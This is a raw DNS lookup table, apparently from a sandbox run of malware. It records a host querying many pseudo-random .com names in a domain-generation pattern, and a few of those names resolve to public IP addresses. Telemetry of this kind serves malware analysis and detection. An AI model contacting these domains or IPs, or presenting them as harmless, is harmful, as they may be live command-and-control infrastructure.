Aug 23, 2024 18:47:43.086007118 CEST	1.1.1.1	192.168.2.4	0xcc63	Name error (3)	lygyged.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.088471889 CEST	1.1.1.1	192.168.2.4	0xd6d8	Name error (3)	vocyrom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.113135099 CEST	1.1.1.1	192.168.2.4	0x708	Name error (3)	lyryvur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.114499092 CEST	1.1.1.1	192.168.2.4	0x8065	Name error (3)	gahyhys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.114511967 CEST	1.1.1.1	192.168.2.4	0x913a	Name error (3)	vowycut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.117311001 CEST	1.1.1.1	192.168.2.4	0xe6de	Name error (3)	qexyriq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.117322922 CEST	1.1.1.1	192.168.2.4	0x164d	Name error (3)	puvytag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.118715048 CEST	1.1.1.1	192.168.2.4	0x98b8	Name error (3)	gaqycyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.118727922 CEST	1.1.1.1	192.168.2.4	0x90e2	Name error (3)	purycul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.118736982 CEST	1.1.1.1	192.168.2.4	0xa98d	Name error (3)	lyxywij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121356964 CEST	1.1.1.1	192.168.2.4	0xefd4	Name error (3)	qedyfog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121368885 CEST	1.1.1.1	192.168.2.4	0xaa37	Name error (3)	lysyfin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121377945 CEST	1.1.1.1	192.168.2.4	0x8bef	Name error (3)	qeqyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121387959 CEST	1.1.1.1	192.168.2.4	0x6b3c	Name error (3)	qetyfop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121397972 CEST	1.1.1.1	192.168.2.4	0xda3	Name error (3)	galyquw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121407986 CEST	1.1.1.1	192.168.2.4	0xe0b3	Name error (3)	qegyqug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121416092 CEST	1.1.1.1	192.168.2.4	0xfe37	Name error (3)	vonyzac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121424913 CEST	1.1.1.1	192.168.2.4	0x62de	Name error (3)	volyquk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.121433020 CEST	1.1.1.1	192.168.2.4	0x651d	Name error (3)	pumyxep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.138891935 CEST	1.1.1.1	192.168.2.4	0xf26f	Name error (3)	vofygaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.139763117 CEST	1.1.1.1	192.168.2.4	0x5a5b	Name error (3)	lymyxex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.139775991 CEST	1.1.1.1	192.168.2.4	0x602c	Name error (3)	gadyfob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.141251087 CEST	1.1.1.1	192.168.2.4	0x9547	Name error (3)	puzywuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.187403917 CEST	1.1.1.1	192.168.2.4	0xcffa	Name error (3)	vopybok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.193444014 CEST	1.1.1.1	192.168.2.4	0x35cd	Name error (3)	puzylol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.218333960 CEST	1.1.1.1	192.168.2.4	0xef5d	Name error (3)	qebyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.366024971 CEST	1.1.1.1	192.168.2.4	0x4ef3	Name error (3)	pupydig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.366359949 CEST	1.1.1.1	192.168.2.4	0xc49b	Name error (3)	qekyqyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.366806030 CEST	1.1.1.1	192.168.2.4	0x4709	Name error (3)	lykymyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.367665052 CEST	1.1.1.1	192.168.2.4	0xc512	Name error (3)	vojymet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.367832899 CEST	1.1.1.1	192.168.2.4	0x370d	Name error (3)	qebylov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.367844105 CEST	1.1.1.1	192.168.2.4	0x2611	Name error (3)	gatyduh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.369405985 CEST	1.1.1.1	192.168.2.4	0xfcae	Name error (3)	lyrysyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.369877100 CEST	1.1.1.1	192.168.2.4	0xb6a8	Name error (3)	vocykif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.370062113 CEST	1.1.1.1	192.168.2.4	0xc7af	Name error (3)	gahynaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.370073080 CEST	1.1.1.1	192.168.2.4	0xf7b	Name error (3)	qetysuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.370614052 CEST	1.1.1.1	192.168.2.4	0x8d01	Name error (3)	qexykug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.371267080 CEST	1.1.1.1	192.168.2.4	0x8be7	Name error (3)	lyxyjun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.371511936 CEST	1.1.1.1	192.168.2.4	0x3172	Name error (3)	purypyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.371522903 CEST	1.1.1.1	192.168.2.4	0x2ee0	Name error (3)	gaqypew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.371532917 CEST	1.1.1.1	192.168.2.4	0xa56f	Name error (3)	lygynox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.374270916 CEST	1.1.1.1	192.168.2.4	0xb760	Name error (3)	pumytol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.375756979 CEST	1.1.1.1	192.168.2.4	0x5c55	Name error (3)	vonyrot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.378757000 CEST	1.1.1.1	192.168.2.4	0x816b	Name error (3)	pupycuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.379231930 CEST	1.1.1.1	192.168.2.4	0x2d3e	Name error (3)	lykygaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.379242897 CEST	1.1.1.1	192.168.2.4	0x374f	Name error (3)	lysyvud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.380377054 CEST	1.1.1.1	192.168.2.4	0x4e1c	Name error (3)	qekyheq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.380656958 CEST	1.1.1.1	192.168.2.4	0xcc8d	Name error (3)	qebyrip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.381825924 CEST	1.1.1.1	192.168.2.4	0x1584	Name error (3)	pujygaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.382102966 CEST	1.1.1.1	192.168.2.4	0x714a	Name error (3)	ganyriz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.382113934 CEST	1.1.1.1	192.168.2.4	0x5013	Name error (3)	gatycyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.382704973 CEST	1.1.1.1	192.168.2.4	0x505	Name error (3)	vopycyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.382714987 CEST	1.1.1.1	192.168.2.4	0xa255	Name error (3)	vojygok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.391994953 CEST	1.1.1.1	192.168.2.4	0x507e	Name error (3)	pujymel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.394309044 CEST	1.1.1.1	192.168.2.4	0x8a5e	Name error (3)	vopydum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.396305084 CEST	1.1.1.1	192.168.2.4	0x5d4b	Name error (3)	ganyzas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.396655083 CEST	1.1.1.1	192.168.2.4	0x52dd	Name error (3)	puvyliv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.396667004 CEST	1.1.1.1	192.168.2.4	0xdfa8	Name error (3)	vowypek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398823023 CEST	1.1.1.1	192.168.2.4	0x9d46	Name error (3)	puzyjyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398838997 CEST	1.1.1.1	192.168.2.4	0xc1cf	Name error (3)	qegynap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398847103 CEST	1.1.1.1	192.168.2.4	0x12ef	Name error (3)	gadyvis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398852110 CEST	1.1.1.1	192.168.2.4	0xa668	Name error (3)	pufybop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398855925 CEST	1.1.1.1	192.168.2.4	0x9a1d	Name error (3)	lymytar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398860931 CEST	1.1.1.1	192.168.2.4	0x7d1	Name error (3)	qedyvuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398864985 CEST	1.1.1.1	192.168.2.4	0x2530	Name error (3)	volyjym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398874998 CEST	1.1.1.1	192.168.2.4	0xe080	Name error (3)	galyheh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.398880005 CEST	1.1.1.1	192.168.2.4	0xbfb6	Name error (3)	gacykub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.399873972 CEST	1.1.1.1	192.168.2.4	0x9146	Name error (3)	lyvywux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.403510094 CEST	1.1.1.1	192.168.2.4	0xaece	Name error (3)	gahyfow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.406445980 CEST	1.1.1.1	192.168.2.4	0xd04d	Name error (3)	puvywup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.438107967 CEST	1.1.1.1	192.168.2.4	0x5257	Name error (3)	qeqytal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.438466072 CEST	1.1.1.1	192.168.2.4	0xb64b	Name error (3)	vocyquc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.438587904 CEST	1.1.1.1	192.168.2.4	0x7c78	Name error (3)	qetyxeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.438862085 CEST	1.1.1.1	192.168.2.4	0xc6db	Name error (3)	puryxag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.439205885 CEST	1.1.1.1	192.168.2.4	0xea63	Name error (3)	lygyfir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.439217091 CEST	1.1.1.1	192.168.2.4	0x5ba1	Name error (3)	qegyfil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.439811945 CEST	1.1.1.1	192.168.2.4	0x3149	Name error (3)	gacyqys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.442214966 CEST	1.1.1.1	192.168.2.4	0x2704	Name error (3)	pufydul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.442676067 CEST	1.1.1.1	192.168.2.4	0x2f2e	Name error (3)	vowyzam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.452251911 CEST	1.1.1.1	192.168.2.4	0x731d	Name error (3)	gaqyzoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.453253984 CEST	1.1.1.1	192.168.2.4	0x65f	Name error (3)	lyxymed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.453264952 CEST	1.1.1.1	192.168.2.4	0x99d0	Name error (3)	puzymev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.455437899 CEST	1.1.1.1	192.168.2.4	0x9774	Name error (3)	vofydut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.455451965 CEST	1.1.1.1	192.168.2.4	0x89a0	Name error (3)	gadyduz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.455461979 CEST	1.1.1.1	192.168.2.4	0x6374	Name error (3)	qeqyloq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.455471992 CEST	1.1.1.1	192.168.2.4	0x581b	Name error (3)	lymylij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.460908890 CEST	1.1.1.1	192.168.2.4	0xe17a	Name error (3)	lyryxen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.474078894 CEST	1.1.1.1	192.168.2.4	0xbdd5	Name error (3)	qexyqyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.530227900 CEST	1.1.1.1	192.168.2.4	0xc6f5	Name error (3)	lyvylod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.538196087 CEST	1.1.1.1	192.168.2.4	0x7a41	Name error (3)	vofybic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.778444052 CEST	1.1.1.1	192.168.2.4	0x5ef9	Name error (3)	volymaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.782680035 CEST	1.1.1.1	192.168.2.4	0xa1c4	Name error (3)	pumyliq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784653902 CEST	1.1.1.1	192.168.2.4	0x180f	Name error (3)	vonykuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.784666061 CEST	1.1.1.1	192.168.2.4	0x796	Name error (3)	lykynon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.786910057 CEST	1.1.1.1	192.168.2.4	0x80ba	Name error (3)	vopypec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.787220001 CEST	1.1.1.1	192.168.2.4	0xf9e5	Name error (3)	qebykul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.787821054 CEST	1.1.1.1	192.168.2.4	0xc9b7	Name error (3)	pujybig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.788465023 CEST	1.1.1.1	192.168.2.4	0xafa4	Name error (3)	lyvyjyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.789928913 CEST	1.1.1.1	192.168.2.4	0xf1d2	Name error (3)	qetytav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790316105 CEST	1.1.1.1	192.168.2.4	0x665e	Name error (3)	lyrytod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.790327072 CEST	1.1.1.1	192.168.2.4	0xa0a6	Name error (3)	gahyvuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.791018009 CEST	1.1.1.1	192.168.2.4	0x5893	Name error (3)	ganykuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.791255951 CEST	1.1.1.1	192.168.2.4	0x3ee5	Name error (3)	puvyjyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.791800976 CEST	1.1.1.1	192.168.2.4	0x3c9e	Name error (3)	vocyjet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.799992085 CEST	1.1.1.1	192.168.2.4	0xa20	Name error (3)	vowyrif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.800170898 CEST	1.1.1.1	192.168.2.4	0x8365	Name error (3)	qexyhap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.800182104 CEST	1.1.1.1	192.168.2.4	0x192e	Name error (3)	gacyhez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.800653934 CEST	1.1.1.1	192.168.2.4	0x7baa	Name error (3)	purytov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.805715084 CEST	1.1.1.1	192.168.2.4	0x523e	Name error (3)	pufycyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.806020021 CEST	1.1.1.1	192.168.2.4	0xf352	Name error (3)	qedysyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.807444096 CEST	1.1.1.1	192.168.2.4	0xfe72	Name error (3)	lysysyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.809235096 CEST	1.1.1.1	192.168.2.4	0x3511	Name error (3)	vofycyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.810796022 CEST	1.1.1.1	192.168.2.4	0x4096	Name error (3)	lyxygax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.811742067 CEST	1.1.1.1	192.168.2.4	0x62ce	Name error (3)	gaqyrib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.812889099 CEST	1.1.1.1	192.168.2.4	0x3bc9	Name error (3)	galynab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.813764095 CEST	1.1.1.1	192.168.2.4	0x4ad1	Name error (3)	galyfis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.813775063 CEST	1.1.1.1	192.168.2.4	0x3cae	Name error (3)	gatypas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.814497948 CEST	1.1.1.1	192.168.2.4	0x1088	Name error (3)	qedyxel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.814619064 CEST	1.1.1.1	192.168.2.4	0x2883	Name error (3)	lymywun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.814630985 CEST	1.1.1.1	192.168.2.4	0x7ce6	Name error (3)	vojybim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815135956 CEST	1.1.1.1	192.168.2.4	0x3945	Name error (3)	pumywug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815145969 CEST	1.1.1.1	192.168.2.4	0x9761	Name error (3)	puzygop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815155029 CEST	1.1.1.1	192.168.2.4	0x3d0	Name error (3)	lysyxar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815166950 CEST	1.1.1.1	192.168.2.4	0x567b	Name error (3)	vonyqym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815176010 CEST	1.1.1.1	192.168.2.4	0xe047	Name error (3)	ganyqyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815186977 CEST	1.1.1.1	192.168.2.4	0x36ec	Name error (3)	volygoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.815888882 CEST	1.1.1.1	192.168.2.4	0x3957	Name error (3)	qebyqeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.816562891 CEST	1.1.1.1	192.168.2.4	0x8025	Name error (3)	pujyduv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.816956043 CEST	1.1.1.1	192.168.2.4	0x775e	Name error (3)	vojyduf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817608118 CEST	1.1.1.1	192.168.2.4	0x77e0	Name error (3)	pupyxal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817696095 CEST	1.1.1.1	192.168.2.4	0xb400	Name error (3)	qegyvuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817706108 CEST	1.1.1.1	192.168.2.4	0x6b52	Name error (3)	qetylip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817795992 CEST	1.1.1.1	192.168.2.4	0x4df1	Name error (3)	lyvymej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817806005 CEST	1.1.1.1	192.168.2.4	0xff70	Name error (3)	puvymaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.817816019 CEST	1.1.1.1	192.168.2.4	0x4e63	Name error (3)	vocymak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.818276882 CEST	1.1.1.1	192.168.2.4	0x7a36	Name error (3)	vopyzot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.818538904 CEST	1.1.1.1	192.168.2.4	0xde3b	Name error (3)	gacynow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.818547964 CEST	1.1.1.1	192.168.2.4	0x137f	Name error (3)	vowykuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.818655014 CEST	1.1.1.1	192.168.2.4	0x7cf1	Name error (3)	purylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.819715023 CEST	1.1.1.1	192.168.2.4	0xc7f0	Name error (3)	qegysyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.820785046 CEST	1.1.1.1	192.168.2.4	0xe41e	Name error (3)	lygysen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.821137905 CEST	1.1.1.1	192.168.2.4	0x4539	Name error (3)	gaqykus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.821147919 CEST	1.1.1.1	192.168.2.4	0xaa7c	Name error (3)	pufypeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.821247101 CEST	1.1.1.1	192.168.2.4	0xdd55	Name error (3)	qexynol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.832201958 CEST	1.1.1.1	192.168.2.4	0x9881	Name error (3)	qeqyrug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.835057974 CEST	1.1.1.1	192.168.2.4	0xe211	Name error (3)	qekyfiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.837970018 CEST	1.1.1.1	192.168.2.4	0xaffe	Name error (3)	lyrylix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.841598034 CEST	1.1.1.1	192.168.2.4	0xf7b2	Name error (3)	gatyzoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.841609955 CEST	1.1.1.1	192.168.2.4	0x494c	Name error (3)	gadycew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.940402985 CEST	1.1.1.1	192.168.2.4	0x2e18	Name error (3)	pupypep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.946537971 CEST	1.1.1.1	192.168.2.4	0x6f59	Name error (3)	qekynog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.964014053 CEST	1.1.1.1	192.168.2.4	0x1bce	Name error (3)	gahydyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.000149012 CEST	1.1.1.1	192.168.2.4	0xf80b	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.019799948 CEST	1.1.1.1	192.168.2.4	0x3b45	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.022563934 CEST	1.1.1.1	192.168.2.4	0xc502	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.027420044 CEST	1.1.1.1	192.168.2.4	0x9c76	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.027431965 CEST	1.1.1.1	192.168.2.4	0x8de6	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.031379938 CEST	1.1.1.1	192.168.2.4	0xa156	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.031379938 CEST	1.1.1.1	192.168.2.4	0xa156	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.031390905 CEST	1.1.1.1	192.168.2.4	0xd256	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.033946991 CEST	1.1.1.1	192.168.2.4	0x9c94	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.033957958 CEST	1.1.1.1	192.168.2.4	0xb2b7	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.033967972 CEST	1.1.1.1	192.168.2.4	0x3471	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.033977985 CEST	1.1.1.1	192.168.2.4	0xe823	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.038348913 CEST	1.1.1.1	192.168.2.4	0xf2ec	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.038360119 CEST	1.1.1.1	192.168.2.4	0x5e94	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.038369894 CEST	1.1.1.1	192.168.2.4	0xc36f	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.041116953 CEST	1.1.1.1	192.168.2.4	0xec34	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.041127920 CEST	1.1.1.1	192.168.2.4	0xdecb	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.046195984 CEST	1.1.1.1	192.168.2.4	0xb131	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.046205997 CEST	1.1.1.1	192.168.2.4	0x3a80	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.046216011 CEST	1.1.1.1	192.168.2.4	0xe8ca	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.046224117 CEST	1.1.1.1	192.168.2.4	0xdf0d	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.046233892 CEST	1.1.1.1	192.168.2.4	0xc663	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.049092054 CEST	1.1.1.1	192.168.2.4	0x5b6d	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.063958883 CEST	1.1.1.1	192.168.2.4	0xb193	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.074814081 CEST	1.1.1.1	192.168.2.4	0x794f	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.087069035 CEST	1.1.1.1	192.168.2.4	0x441a	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.093502998 CEST	1.1.1.1	192.168.2.4	0xc189	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.093858004 CEST	1.1.1.1	192.168.2.4	0x964c	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.093868017 CEST	1.1.1.1	192.168.2.4	0xe658	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
